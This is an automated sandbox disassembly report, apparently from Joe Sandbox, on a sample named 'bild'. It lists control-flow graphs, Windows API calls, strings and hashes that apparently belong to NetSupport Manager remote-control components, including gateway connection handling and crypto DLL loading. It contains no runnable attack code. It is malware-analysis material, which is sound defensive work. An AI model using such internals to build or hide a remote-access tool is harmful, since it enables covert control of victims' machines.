                                                                                                              control_flow_graph 2653 6c7963c0-6c796402 call 6c7b4710 EnterCriticalSection InterlockedDecrement 2656 6c796408-6c79641f EnterCriticalSection 2653->2656 2657 6c7965ed-6c796608 LeaveCriticalSection call 6c7b28e1 2653->2657 2659 6c7964da-6c7964e0 2656->2659 2660 6c796425-6c796431 2656->2660 2663 6c7965bd-6c7965e8 call 6c7b1c50 LeaveCriticalSection 2659->2663 2664 6c7964e6-6c7964f0 shutdown 2659->2664 2661 6c796443-6c796447 2660->2661 2662 6c796433-6c796441 GetProcAddress 2660->2662 2666 6c796449-6c79644c 2661->2666 2667 6c79644e-6c796450 SetLastError 2661->2667 2662->2661 2663->2657 2668 6c79650a-6c79652d timeGetTime #16 2664->2668 2669 6c7964f2-6c796507 GetLastError call 6c7930a0 2664->2669 2671 6c796456-6c796465 2666->2671 2667->2671 2673 6c79656c-6c79656e 2668->2673 2674 6c79652f 2668->2674 2669->2668 2678 6c796477-6c79647b 2671->2678 2679 6c796467-6c796475 GetProcAddress 2671->2679 2676 6c796570-6c79657b closesocket 2673->2676 2681 6c796551-6c79656a #16 2674->2681 2682 6c796531 2674->2682 2683 6c79657d-6c79658a WSAGetLastError 2676->2683 2684 6c7965b6 2676->2684 2685 6c79647d-6c796480 2678->2685 2686 6c796482-6c796484 SetLastError 2678->2686 2679->2678 2681->2673 2681->2674 2682->2681 2687 6c796533-6c79653e GetLastError 2682->2687 2688 6c79658c-6c79658e Sleep 2683->2688 2689 6c796594-6c796598 2683->2689 2684->2663 2690 6c79648a-6c796499 2685->2690 2686->2690 2687->2673 2691 6c796540-6c796547 timeGetTime 2687->2691 2688->2689 2689->2676 2692 6c79659a-6c79659c 2689->2692 2694 6c7964ab-6c7964af 2690->2694 2695 6c79649b-6c7964a9 GetProcAddress 2690->2695 2691->2673 2696 6c796549-6c79654b Sleep 2691->2696 2692->2684 2699 6c79659e-6c7965b3 GetLastError call 6c7930a0 2692->2699 2697 6c7964b1-6c7964be 2694->2697 2698 6c7964c3-6c7964d5 SetLastError 2694->2698 2695->2694 2696->2681 2697->2663 2698->2663 2699->2684
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(6C7DB898,00000000,?,00000000,?,6C79D77B,00000000), ref: 6C7963E8
                                                                                                              • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6C7963FA
                                                                                                              • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6C79D77B,00000000), ref: 6C796412
                                                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C79643B
                                                                                                              • SetLastError.KERNEL32(00000078,?,00000000,?,6C79D77B,00000000), ref: 6C796450
                                                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C79646F
                                                                                                              • SetLastError.KERNEL32(00000078,?,00000000,?,6C79D77B,00000000), ref: 6C796484
                                                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C7964A3
                                                                                                              • SetLastError.KERNEL32(00000078,?,00000000,?,6C79D77B,00000000), ref: 6C7964C5
                                                                                                              • shutdown.WSOCK32(?,00000001,?,00000000,?,6C79D77B,00000000), ref: 6C7964E9
                                                                                                              • GetLastError.KERNEL32(?,00000001,?,00000000,?,6C79D77B,00000000), ref: 6C7964F2
                                                                                                              • timeGetTime.WINMM(?,00000001,?,00000000,?,6C79D77B,00000000), ref: 6C796510
                                                                                                              • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6C79D77B,00000000), ref: 6C796526
                                                                                                              • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6C79D77B,00000000), ref: 6C796533
                                                                                                              • timeGetTime.WINMM(?,00000000,?,6C79D77B,00000000), ref: 6C796540
                                                                                                              • Sleep.KERNEL32(00000001,?,00000000,?,6C79D77B,00000000), ref: 6C79654B
                                                                                                              • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6C79D77B,00000000), ref: 6C796563
                                                                                                              • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C79D77B,00000000), ref: 6C796574
                                                                                                              • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C79D77B,00000000), ref: 6C79657D
                                                                                                              • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6C79D77B,00000000), ref: 6C79658E
                                                                                                              • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6C79D77B,00000000), ref: 6C79659E
                                                                                                              • _memset.LIBCMT ref: 6C7965C8
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,6C79D77B,00000000), ref: 6C7965D7
                                                                                                              • LeaveCriticalSection.KERNEL32(6C7DB898,?,00000000,?,6C79D77B,00000000), ref: 6C7965F2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                                              • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                                              • API String ID: 3764039262-2631155478
                                                                                                              • Opcode ID: c673967eeff0b67b095371a9004484d36ade249170d14deddb8e3c7b7b8e5b94
                                                                                                              • Instruction ID: de8c6d6316bfeee6c2f9161b1edefbed8426f8608e11905c3935e5adb5039424
                                                                                                              • Opcode Fuzzy Hash: c673967eeff0b67b095371a9004484d36ade249170d14deddb8e3c7b7b8e5b94
                                                                                                              • Instruction Fuzzy Hash: E551B471740340AFDB50EF68DA88B5A73B9EF49314F110634E519D7A80DB70FA84CBA1

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2703 6c7998d0-6c799932 2704 6c799934-6c799955 call 6c7930a0 call 6c7b28e1 2703->2704 2705 6c799956-6c79995e 2703->2705 2707 6c799ac5-6c799acc 2705->2707 2708 6c799964-6c799979 _strncmp 2705->2708 2710 6c799b19-6c799b1d 2707->2710 2711 6c799ace-6c799adb 2707->2711 2708->2707 2712 6c79997f-6c799994 call 6c7b4330 2708->2712 2713 6c799b4b-6c799b70 GetTickCount InterlockedExchange EnterCriticalSection 2710->2713 2714 6c799b1f-6c799b26 2710->2714 2716 6c799af8-6c799b07 wsprintfA 2711->2716 2717 6c799add-6c799af6 wsprintfA 2711->2717 2712->2707 2730 6c79999a-6c7999af _strncmp 2712->2730 2720 6c799b9c-6c799ba1 2713->2720 2721 6c799b72-6c799b9b LeaveCriticalSection call 6c7930a0 call 6c7b28e1 2713->2721 2714->2713 2719 6c799b28-6c799b41 call 6c7977b0 2714->2719 2723 6c799b0a-6c799b16 call 6c7952b0 2716->2723 2717->2723 2719->2713 2740 6c799b43-6c799b45 2719->2740 2728 6c799bfb-6c799c05 2720->2728 2729 6c799ba3-6c799bd0 call 6c794dd0 2720->2729 2723->2710 2735 6c799c3b-6c799c47 2728->2735 2736 6c799c07-6c799c17 2728->2736 2745 6c799d4b-6c799d6c LeaveCriticalSection call 6c7a77e0 2729->2745 2746 6c799bd6-6c799bf6 WSAGetLastError call 6c7930a0 2729->2746 2730->2707 2732 6c7999b5-6c7999f1 2730->2732 2739 6c7999f7-6c7999ff 2732->2739 2744 6c799c50-6c799c5a 2735->2744 2741 6c799c19-6c799c1d 2736->2741 2742 6c799c20-6c799c22 2736->2742 2747 6c799aa3-6c799ac2 call 6c7930a0 2739->2747 2748 6c799a05-6c799a08 2739->2748 2740->2713 2741->2742 2749 6c799c1f 2741->2749 2742->2735 2752 6c799c24-6c799c36 call 6c7946c0 2742->2752 2750 6c799d2e-6c799d3b call 6c7930a0 2744->2750 2751 6c799c60-6c799c65 2744->2751 2770 6c799d78-6c799d8a call 6c7b28e1 2745->2770 2771 6c799d6e-6c799d72 InterlockedIncrement 2745->2771 2746->2745 2747->2707 2756 6c799a0a-6c799a0c 2748->2756 2757 6c799a0e 2748->2757 2749->2742 2777 6c799d45 2750->2777 2759 6c799c71-6c799c9a send 2751->2759 2760 6c799c67-6c799c6b 2751->2760 2752->2735 2765 6c799a14-6c799a1d 2756->2765 2757->2765 2767 6c799c9c-6c799c9f 2759->2767 2768 6c799cf1-6c799d0f call 6c7930a0 2759->2768 2760->2750 2760->2759 2772 6c799a8d-6c799a8e 2765->2772 2773 6c799a1f-6c799a22 2765->2773 2775 6c799cbe-6c799cce WSAGetLastError 2767->2775 2776 6c799ca1-6c799cac 2767->2776 2768->2777 2771->2770 2772->2747 2781 6c799a24 2773->2781 2782 6c799a26-6c799a35 2773->2782 2778 6c799d11-6c799d2c call 6c7930a0 2775->2778 2779 6c799cd0-6c799ce9 timeGetTime Sleep 2775->2779 2776->2777 2784 6c799cb2-6c799cbc 2776->2784 2777->2745 2778->2777 2779->2744 2785 6c799cef 2779->2785 2781->2782 2787 6c799a90-6c799a93 2782->2787 2788 6c799a37-6c799a3a 2782->2788 2784->2779 2785->2777 2790 6c799a9d 2787->2790 2791 6c799a3c 2788->2791 2792 6c799a3e-6c799a4d 2788->2792 2790->2747 2791->2792 2794 6c799a4f-6c799a52 2792->2794 2795 6c799a95-6c799a98 2792->2795 2796 6c799a54 2794->2796 2797 6c799a56-6c799a65 2794->2797 2795->2790 2796->2797 2798 6c799a9a 2797->2798 2799 6c799a67-6c799a6a 2797->2799 2798->2790 2800 6c799a6c 2799->2800 2801 6c799a6e-6c799a85 2799->2801 2800->2801 2801->2739 2802 6c799a8b 2801->2802 2802->2747
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _strncmp
                                                                                                              • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                                              • API String ID: 909875538-2848211065
                                                                                                              • Opcode ID: 0be5aca1b470905f8cdf01aa98c025bf0442605cec37a9ba8d65af040bc06a4a
                                                                                                              • Instruction ID: f815a2c84575e28e4204d271575f30a40895943f96c6eabb80206c03d4eb9c3c
                                                                                                              • Opcode Fuzzy Hash: 0be5aca1b470905f8cdf01aa98c025bf0442605cec37a9ba8d65af040bc06a4a
                                                                                                              • Instruction Fuzzy Hash: 0ED1F371A052149FEB20CF64EE89BD9B7B5EF2A318F0441E9D80D9B641D731AA88CF51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2803 110285f0-1102860d 2804 11028613-11028642 2803->2804 2805 11028cd8-11028cdf 2803->2805 2806 110286d0-11028718 GetModuleFileNameA call 111631f0 call 11163fed 2804->2806 2807 11028648-1102864e 2804->2807 2808 11028cf1-11028cf5 2805->2808 2809 11028ce1-11028cea 2805->2809 2823 1102871d 2806->2823 2811 11028650-11028658 2807->2811 2813 11028cf7-11028d09 call 11161d01 2808->2813 2814 11028d0a-11028d1e call 11161d01 2808->2814 2809->2808 2812 11028cec 2809->2812 2811->2811 2816 1102865a-11028660 2811->2816 2812->2808 2821 11028663-11028668 2816->2821 2821->2821 2824 1102866a-11028674 2821->2824 2825 11028720-1102872a 2823->2825 2826 11028691-11028697 2824->2826 2827 11028676-1102867d 2824->2827 2828 11028730-11028733 2825->2828 2829 11028ccf-11028cd7 2825->2829 2831 11028698-1102869e 2826->2831 2830 11028680-11028686 2827->2830 2828->2829 2832 11028739-11028747 call 11026890 2828->2832 2829->2805 2830->2830 2833 11028688-1102868e 2830->2833 2831->2831 2834 110286a0-110286ce call 11163fed 2831->2834 2839 11028c55-11028c6a call 11163db7 2832->2839 2840 1102874d-11028760 call 11162de7 2832->2840 2833->2826 2834->2825 2839->2829 2845 11028c70-11028cca 2839->2845 2846 11028762-11028765 2840->2846 2847 1102876b-11028793 call 11026700 call 11026890 2840->2847 2845->2829 2846->2839 2846->2847 2847->2839 2852 11028799-110287b6 call 11026980 call 11026890 2847->2852 2857 11028bc5-11028bcc 2852->2857 2858 110287bc 2852->2858 2859 11028bf2-11028bf9 2857->2859 2860 11028bce-11028bd1 2857->2860 2861 110287c0-110287e0 call 11026700 2858->2861 2863 11028c11-11028c18 2859->2863 2864 11028bfb-11028c01 2859->2864 2860->2859 2862 11028bd3-11028bda 2860->2862 2871 110287e2-110287e5 2861->2871 2872 11028816-11028819 2861->2872 2866 11028be0-11028bf0 2862->2866 2868 11028c1a-11028c25 2863->2868 2869 11028c28-11028c2f 2863->2869 2867 11028c07-11028c0f 2864->2867 2866->2859 2866->2866 2867->2863 2867->2867 2868->2869 2873 11028c31-11028c3b 2869->2873 2874 11028c3e-11028c45 2869->2874 2878 110287e7-110287ee 2871->2878 2879 110287fe-11028801 2871->2879 2876 11028bae-11028bbf call 11026890 2872->2876 2877 1102881f-11028832 call 11164150 2872->2877 2873->2874 2874->2839 2875 11028c47-11028c52 2874->2875 2875->2839 2876->2857 2876->2861 2877->2876 2886 11028838-11028854 call 111646ce 2877->2886 2880 110287f4-110287fc 2878->2880 2879->2876 2881 11028807-11028811 2879->2881 2880->2879 2880->2880 2881->2876 2889 11028856-1102885c 2886->2889 2890 1102886f-11028885 call 111646ce 2886->2890 2891 11028860-11028868 2889->2891 2895 11028887-1102888d 2890->2895 2896 1102889f-110288b5 call 111646ce 2890->2896 2891->2891 2893 1102886a 2891->2893 2893->2876 2897 11028890-11028898 2895->2897 2901 110288b7-110288bd 2896->2901 2902 110288cf-110288e5 call 111646ce 2896->2902 2897->2897 2899 1102889a 2897->2899 2899->2876 2903 110288c0-110288c8 2901->2903 2907 110288e7-110288ed 2902->2907 2908 110288ff-11028915 call 111646ce 2902->2908 2903->2903 2905 110288ca 2903->2905 2905->2876 2910 110288f0-110288f8 2907->2910 2913 11028917-1102891d 2908->2913 2914 1102892f-11028945 call 111646ce 2908->2914 2910->2910 2912 110288fa 2910->2912 2912->2876 2915 11028920-11028928 2913->2915 2919 11028947-1102894d 2914->2919 2920 1102895f-11028975 call 111646ce 2914->2920 2915->2915 2917 1102892a 2915->2917 2917->2876 2921 11028950-11028958 2919->2921 2925 11028977-1102897d 2920->2925 2926 1102898f-110289a5 call 111646ce 2920->2926 2921->2921 2923 1102895a 2921->2923 2923->2876 2928 11028980-11028988 2925->2928 2931 110289a7-110289ad 2926->2931 2932 110289bf-110289d5 call 111646ce 2926->2932 2928->2928 2929 1102898a 2928->2929 2929->2876 2933 110289b0-110289b8 2931->2933 2937 110289d7-110289dd 2932->2937 2938 110289ef-11028a05 call 111646ce 2932->2938 2933->2933 2935 110289ba 2933->2935 2935->2876 2939 110289e0-110289e8 2937->2939 2943 11028a07-11028a0d 2938->2943 2944 11028a1f-11028a35 call 111646ce 2938->2944 2939->2939 2941 110289ea 2939->2941 2941->2876 2945 11028a10-11028a18 2943->2945 2949 11028a37-11028a3d 2944->2949 2950 11028a4f-11028a65 call 111646ce 2944->2950 2945->2945 2947 11028a1a 2945->2947 2947->2876 2951 11028a40-11028a48 2949->2951 2955 11028a86-11028a9c call 111646ce 2950->2955 2956 11028a67-11028a6d 2950->2956 2951->2951 2953 11028a4a 2951->2953 2953->2876 2961 11028ab3-11028ac9 call 111646ce 2955->2961 2962 11028a9e 2955->2962 2958 11028a77-11028a7f 2956->2958 2958->2958 2960 11028a81 2958->2960 2960->2876 2967 11028ae0-11028af6 call 111646ce 2961->2967 2968 11028acb 2961->2968 2963 11028aa4-11028aac 2962->2963 2963->2963 2965 11028aae 2963->2965 2965->2876 2973 11028b17-11028b2d call 111646ce 2967->2973 2974 11028af8-11028afe 2967->2974 2969 11028ad1-11028ad9 2968->2969 2969->2969 2971 11028adb 2969->2971 2971->2876 2979 11028b4f-11028b65 call 111646ce 2973->2979 2980 11028b2f-11028b3f 2973->2980 2976 11028b08-11028b10 2974->2976 2976->2976 2977 11028b12 2976->2977 2977->2876 2985 11028b67-11028b6d 2979->2985 2986 11028b7c-11028b92 call 111646ce 2979->2986 2981 11028b40-11028b48 2980->2981 2981->2981 2983 11028b4a 2981->2983 2983->2876 2987 11028b70-11028b78 2985->2987 2986->2876 2991 11028b94-11028b9a 2986->2991 2987->2987 2989 11028b7a 2987->2989 2989->2876 2992 11028ba4-11028bac 2991->2992 2992->2876 2992->2992
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6D131370,?,0000001A), ref: 110286DD
                                                                                                              • _strrchr.LIBCMT ref: 110286EC
                                                                                                                • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                              • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                              • API String ID: 1609618855-357498123
                                                                                                              • Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                                              • Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
                                                                                                              • Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                                              • Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 6C7A6BD5
                                                                                                              • GetTickCount.KERNEL32 ref: 6C7A6C26
                                                                                                              • Sleep.KERNEL32(00000064), ref: 6C7A6C5B
                                                                                                                • Part of subcall function 6C7A6940: GetTickCount.KERNEL32 ref: 6C7A6950
                                                                                                              • WaitForSingleObject.KERNEL32(000002F8,?), ref: 6C7A6C7C
                                                                                                              • _memmove.LIBCMT ref: 6C7A6C93
                                                                                                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6C7A6CB4
                                                                                                              • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6C7A6CD9
                                                                                                              • GetTickCount.KERNEL32 ref: 6C7A6CEC
                                                                                                              • _calloc.LIBCMT ref: 6C7A6D76
                                                                                                              • GetTickCount.KERNEL32 ref: 6C7A6DF3
                                                                                                              • InterlockedExchange.KERNEL32(03092F72,00000000), ref: 6C7A6E01
                                                                                                              • _calloc.LIBCMT ref: 6C7A6E33
                                                                                                              • _memmove.LIBCMT ref: 6C7A6E47
                                                                                                              • InterlockedDecrement.KERNEL32(03092F1A), ref: 6C7A6EC3
                                                                                                              • SetEvent.KERNEL32(000002F4), ref: 6C7A6ECF
                                                                                                              • _memmove.LIBCMT ref: 6C7A6EF4
                                                                                                              • GetTickCount.KERNEL32 ref: 6C7A6F4F
                                                                                                              • InterlockedExchange.KERNEL32(03092EBA,-6C7DA188), ref: 6C7A6F60
                                                                                                              Strings
                                                                                                              • FALSE, xrefs: 6C7A6E67
                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C7A6E62
                                                                                                              • ResumeTimeout, xrefs: 6C7A6BBA
                                                                                                              • httprecv, xrefs: 6C7A6BDD
                                                                                                              • ProcessMessage returned FALSE. Terminating connection, xrefs: 6C7A6F25
                                                                                                              • ReadMessage returned FALSE. Terminating connection, xrefs: 6C7A6F3A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                                              • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                              • API String ID: 1449423504-919941520
                                                                                                              • Opcode ID: 964ea5db3384d4fffba3470844b4be2fde2570dd943dee425e8291687406cc32
                                                                                                              • Instruction ID: ec922cb8400e93843d4f7ffc33858ec2776c905f3b4537d42f565573c7cf453c
                                                                                                              • Opcode Fuzzy Hash: 964ea5db3384d4fffba3470844b4be2fde2570dd943dee425e8291687406cc32
                                                                                                              • Instruction Fuzzy Hash: 20B1B3B1D00254ABDB20DF68CE48BD977B4BB48349F0442A9E549E7640E7B4ABC5CF91
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 110867EC
                                                                                                              • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                                              • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                                              • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                                              • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                                              • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                                              • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                              • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                              • API String ID: 2201880244-3035937465
                                                                                                              • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                                              • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                                              • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                                              • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50
                                                                                                              APIs
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
